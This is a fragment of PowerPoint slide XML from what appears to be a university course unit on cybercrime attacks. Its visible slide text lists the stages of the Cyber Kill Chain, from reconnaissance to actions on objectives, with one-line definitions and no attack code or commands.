            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="212121"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>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Reconnaissance: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Gathering information about the target.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Weaponization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>: Creating or acquiring tools for the attack.</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Delivery:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Transmitting the weaponized payload to the target.</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Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Taking advantage of vulnerabilities to execute the payload.</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Installation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Establishing a persistent presence on the target system.</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Command and Control: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Maintaining communication and control over the compromised system.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Actions on Objectives:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Achieving the attacker's final goal or objective.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1544" name="Google Shape;1544;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6055541" y="9953625"/>
            <a:ext cx="6687820" cy="276225"/>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1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>#2101CS632 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>   UNIT 2 - Attacks &amp; Techniques used in Cyber Crime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10767</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>1217</Paragraphs>
  <Slides>92</Slides>
  <Notes>92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92</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="98" baseType="lpstr">
      <vt:lpstr>Roboto Condensed Light</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Condensed</vt:lpstr>
      <vt:lpstr>Roboto Condensed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3</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-21T22:25:14Z</dcterms:modified>
</cp:coreProperties>
</file>